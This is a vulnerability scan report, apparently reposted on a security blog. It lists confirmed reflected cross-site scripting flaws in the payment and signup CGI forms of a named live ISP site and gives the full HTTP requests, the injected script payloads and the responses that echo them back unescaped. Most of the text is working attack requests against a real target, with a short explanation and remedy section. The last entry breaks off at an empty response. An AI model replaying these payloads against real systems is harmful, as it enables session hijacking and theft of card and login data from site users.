XSS.CX Research Blog

The DORK Report

Loading

NETSPARKER SCAN REPORT SUMMARY

Netsparker - Scan Report Summary
TARGET URL
 https://secure.gis.net/
SCAN DATE
 9/24/2010 9:41:09 PM
REPORT DATE
 9/25/2010 7:10:21 AM
SCAN DURATION
 03:02:39.1093750

Total Requests

Average Speed

req/sec.
28
identified
27
confirmed
0
critical
2
informational

SCAN SETTINGS

Scan Settings
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Proxy
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
MEDIUM
86 %
LOW
7 %
INFORMATION
7 %
Cross-site Scripting

Cross-site Scripting

24 TOTAL
MEDIUM
CONFIRMED
24
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /dsl_c2.cgi

/dsl_c2.cgi CONFIRMED

https://secure.gis.net/dsl_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST 250 Minute Bundle
activationfee POST 3
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGSTREET POST 3
BILLINGZIP POST 3
broadbandphone POST Free_VOIP_Service
CARDTYPE POST '"--><script>alert(0x000248)</script>
CCNUM POST 3
CITY POST 3
COMPANY POST 3
DSL_Installation_Phone POST 3
DSL_Service_Type POST Business_DSL 3Mbps
dsltotal POST 3
dsltotal1 POST 3
dsltotal2 POST 3
dsltotal3 POST 3
dsltotal4 POST 3
email POST netsparker@example.com
EXPMONTH POST 3
EXPYEAR POST 3
FIRSTNAME POST Ronald Smith
GalaxyUse POST 3
LASTNAME POST Ronald Smith
monthlytotal POST 3
monthlytotal0 POST 3
monthlytotal1 POST 3
monthlytotal2 POST 3
monthlytotal3 POST 3
Name_of_Phone_Company POST Ronald Smith
NAMEONCARD POST Ronald Smith
PHONE POST 3
SOURCE POST 3
STATE POST 3
STREET POST 3
subject POST Combo DSL-VOIP Web Order
tosagree POST agree
totaltotal POST 3
ZIP POST 3

Request

POST /dsl_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/dslcombo_business.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 695
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=250+Minute+Bundle&activationfee=3&BILLINGCITY=3&BILLINGSTATE=3&BILLINGSTREET=3&BILLINGZIP=3&broadbandphone=Free_VOIP_Service&CARDTYPE='%22--%3e%3cscript%3enetsparker(0x000248)%3c%2fscript%3e&CCNUM=3&CITY=3&COMPANY=3&DSL_Installation_Phone=3&DSL_Service_Type=Business_DSL+3Mbps&dsltotal=3&dsltotal1=3&dsltotal2=3&dsltotal3=3&dsltotal4=3&email=netsparker%40example.com&EXPMONTH=3&EXPYEAR=3&FIRSTNAME=Ronald+Smith&GalaxyUse=3&LASTNAME=Ronald+Smith&monthlytotal=3&monthlytotal0=3&monthlytotal1=3&monthlytotal2=3&monthlytotal3=3&Name_of_Phone_Company=Ronald+Smith&NAMEONCARD=Ronald+Smith&PHONE=3&SOURCE=3&STATE=3&STREET=3&subject=Combo+DSL-VOIP+Web+Order&tosagree=agree&totaltotal=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 01:52:42 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: '"--><script>netsparker(0x000248)</script> <P>3<P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /dsl_c2.cgi

/dsl_c2.cgi CONFIRMED

https://secure.gis.net/dsl_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST 250 Minute Bundle
activationfee POST 3
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGSTREET POST 3
BILLINGZIP POST 3
broadbandphone POST Free_VOIP_Service
CARDTYPE POST V
CCNUM POST '"--><script>alert(0x000249)</script>
CITY POST 3
COMPANY POST 3
DSL_Installation_Phone POST 3
DSL_Service_Type POST Business_DSL 3Mbps
dsltotal POST 3
dsltotal1 POST 3
dsltotal2 POST 3
dsltotal3 POST 3
dsltotal4 POST 3
email POST netsparker@example.com
EXPMONTH POST 3
EXPYEAR POST 3
FIRSTNAME POST Ronald Smith
GalaxyUse POST 3
LASTNAME POST Ronald Smith
monthlytotal POST 3
monthlytotal0 POST 3
monthlytotal1 POST 3
monthlytotal2 POST 3
monthlytotal3 POST 3
Name_of_Phone_Company POST Ronald Smith
NAMEONCARD POST Ronald Smith
PHONE POST 3
SOURCE POST 3
STATE POST 3
STREET POST 3
subject POST Combo DSL-VOIP Web Order
tosagree POST agree
totaltotal POST 3
ZIP POST 3

Request

POST /dsl_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/dslcombo_business.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 695
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=250+Minute+Bundle&activationfee=3&BILLINGCITY=3&BILLINGSTATE=3&BILLINGSTREET=3&BILLINGZIP=3&broadbandphone=Free_VOIP_Service&CARDTYPE=V&CCNUM='%22--%3e%3cscript%3enetsparker(0x000249)%3c%2fscript%3e&CITY=3&COMPANY=3&DSL_Installation_Phone=3&DSL_Service_Type=Business_DSL+3Mbps&dsltotal=3&dsltotal1=3&dsltotal2=3&dsltotal3=3&dsltotal4=3&email=netsparker%40example.com&EXPMONTH=3&EXPYEAR=3&FIRSTNAME=Ronald+Smith&GalaxyUse=3&LASTNAME=Ronald+Smith&monthlytotal=3&monthlytotal0=3&monthlytotal1=3&monthlytotal2=3&monthlytotal3=3&Name_of_Phone_Company=Ronald+Smith&NAMEONCARD=Ronald+Smith&PHONE=3&SOURCE=3&STATE=3&STREET=3&subject=Combo+DSL-VOIP+Web+Order&tosagree=agree&totaltotal=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 01:52:45 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: V <P>'"><script>netsparker(0x000249)</script><P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /voip/voip_c2.cgi

/voip/voip_c2.cgi CONFIRMED

https://secure.gis.net/voip/voip_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST 250 Minute Bundle
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGSTREET POST 3
BILLINGZIP POST 3
CARDTYPE POST '"--><script>alert(0x000543)</script>
CCNUM POST 3
CITY POST 3
COMMENTS POST 3
COMPANY POST 3
EMAIL POST netsparker@example.com
EXPMONTH POST 3
EXPYEAR POST 3
FIRSTNAME POST Ronald Smith
INTERNETTYPE POST 3
LASTNAME POST Ronald Smith
monthlytotal POST 3
monthlytotal0 POST 3
monthlytotal1 POST 3
monthlytotal2 POST 3
monthlytotal3 POST 3
monthlytotal4 POST 3
NAMEONCARD POST Ronald Smith
OFFERCODE POST 3
onetimetotal POST 3
onetimetotal0 POST 3
onetimetotal1 POST 3
onetimetotal2 POST 0
onetimetotal3 POST 0.00
pcphone POST 0.00
PHONE POST 3
PHONETYPE POST Sipura Adapter
RATECENTER POST 3
REQUESTEDSTATE POST MA
SOURCE POST 3
STATE POST 3
STREET POST 3
tosagree POST agree
ZIP POST 3

Request

POST /voip/voip_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 638
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=250+Minute+Bundle&BILLINGCITY=3&BILLINGSTATE=3&BILLINGSTREET=3&BILLINGZIP=3&CARDTYPE='%22--%3e%3cscript%3enetsparker(0x000543)%3c%2fscript%3e&CCNUM=3&CITY=3&COMMENTS=3&COMPANY=3&EMAIL=netsparker%40example.com&EXPMONTH=3&EXPYEAR=3&FIRSTNAME=Ronald+Smith&INTERNETTYPE=3&LASTNAME=Ronald+Smith&monthlytotal=3&monthlytotal0=3&monthlytotal1=3&monthlytotal2=3&monthlytotal3=3&monthlytotal4=3&NAMEONCARD=Ronald+Smith&OFFERCODE=3&onetimetotal=3&onetimetotal0=3&onetimetotal1=3&onetimetotal2=0&onetimetotal3=0.00&pcphone=0.00&PHONE=3&PHONETYPE=Sipura+Adapter&RATECENTER=3&REQUESTEDSTATE=MA&SOURCE=3&STATE=3&STREET=3&tosagree=agree&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:17:06 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: '"--><script>netsparker(0x000543)</script> <P>3<P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /voip/voip_c2.cgi

/voip/voip_c2.cgi CONFIRMED

https://secure.gis.net/voip/voip_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST 250 Minute Bundle
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGSTREET POST 3
BILLINGZIP POST 3
CARDTYPE POST V
CCNUM POST '"--><script>alert(0x000544)</script>
CITY POST 3
COMMENTS POST 3
COMPANY POST 3
EMAIL POST netsparker@example.com
EXPMONTH POST 3
EXPYEAR POST 3
FIRSTNAME POST Ronald Smith
INTERNETTYPE POST 3
LASTNAME POST Ronald Smith
monthlytotal POST 3
monthlytotal0 POST 3
monthlytotal1 POST 3
monthlytotal2 POST 3
monthlytotal3 POST 3
monthlytotal4 POST 3
NAMEONCARD POST Ronald Smith
OFFERCODE POST 3
onetimetotal POST 3
onetimetotal0 POST 3
onetimetotal1 POST 3
onetimetotal2 POST 0
onetimetotal3 POST 0.00
pcphone POST 0.00
PHONE POST 3
PHONETYPE POST Sipura Adapter
RATECENTER POST 3
REQUESTEDSTATE POST MA
SOURCE POST 3
STATE POST 3
STREET POST 3
tosagree POST agree
ZIP POST 3

Request

POST /voip/voip_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 638
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=250+Minute+Bundle&BILLINGCITY=3&BILLINGSTATE=3&BILLINGSTREET=3&BILLINGZIP=3&CARDTYPE=V&CCNUM='%22--%3e%3cscript%3enetsparker(0x000544)%3c%2fscript%3e&CITY=3&COMMENTS=3&COMPANY=3&EMAIL=netsparker%40example.com&EXPMONTH=3&EXPYEAR=3&FIRSTNAME=Ronald+Smith&INTERNETTYPE=3&LASTNAME=Ronald+Smith&monthlytotal=3&monthlytotal0=3&monthlytotal1=3&monthlytotal2=3&monthlytotal3=3&monthlytotal4=3&NAMEONCARD=Ronald+Smith&OFFERCODE=3&onetimetotal=3&onetimetotal0=3&onetimetotal1=3&onetimetotal2=0&onetimetotal3=0.00&pcphone=0.00&PHONE=3&PHONETYPE=Sipura+Adapter&RATECENTER=3&REQUESTEDSTATE=MA&SOURCE=3&STATE=3&STREET=3&tosagree=agree&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:17:08 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: V <P>'"><script>netsparker(0x000544)</script><P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST '"--><script>alert(0x000721)</script>
CITY POST 3
DOMAIN POST 3
EMAIL POST netsparker@example.com
NAME POST Ronald Smith
PHONE POST 3
STATE POST 3
STREET POST 3
ZIP POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 164
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE='%22--%3e%3cscript%3enetsparker(0x000721)%3c%2fscript%3e&CITY=3&DOMAIN=3&EMAIL=netsparker%40example.com&NAME=Ronald+Smith&PHONE=3&STATE=3&STREET=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:28:23 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x000721)</script>"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="Ronald+Smith"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE="3"> <B>Account Type:<BR> 3, 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST Economy Hosting
CITY POST '"--><script>alert(0x000724)</script>
DOMAIN POST 3
EMAIL POST netsparker@example.com
NAME POST Ronald Smith
PHONE POST 3
STATE POST 3
STREET POST 3
ZIP POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 178
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=Economy+Hosting&CITY='%22--%3e%3cscript%3enetsparker(0x000724)%3c%2fscript%3e&DOMAIN=3&EMAIL=netsparker%40example.com&NAME=Ronald+Smith&PHONE=3&STATE=3&STREET=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:28:26 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Economy Hosting"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x000724)</script>"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="Ronald+Smith"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE="3"> <B>Account Type:<BR> 3, 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST Economy Hosting
CITY POST 3
DOMAIN POST '"--><script>alert(0x000727)</script>
EMAIL POST netsparker@example.com
NAME POST Ronald Smith
PHONE POST 3
STATE POST 3
STREET POST 3
ZIP POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 178
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=Economy+Hosting&CITY=3&DOMAIN='%22--%3e%3cscript%3enetsparker(0x000727)%3c%2fscript%3e&EMAIL=netsparker%40example.com&NAME=Ronald+Smith&PHONE=3&STATE=3&STREET=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:28:28 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Economy Hosting"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x000727)</script>"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="Ronald+Smith"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE="3"> <B>Account Type:<BR> 3, 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST Economy Hosting
CITY POST 3
DOMAIN POST 3
EMAIL POST '"--><script>alert(0x00072A)</script>
NAME POST Ronald Smith
PHONE POST 3
STATE POST 3
STREET POST 3
ZIP POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 155
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=Economy+Hosting&CITY=3&DOMAIN=3&EMAIL='%22--%3e%3cscript%3enetsparker(0x00072A)%3c%2fscript%3e&NAME=Ronald+Smith&PHONE=3&STATE=3&STREET=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:28:30 GMT
Server: Apache
Connection: close
Content-Type: text/html


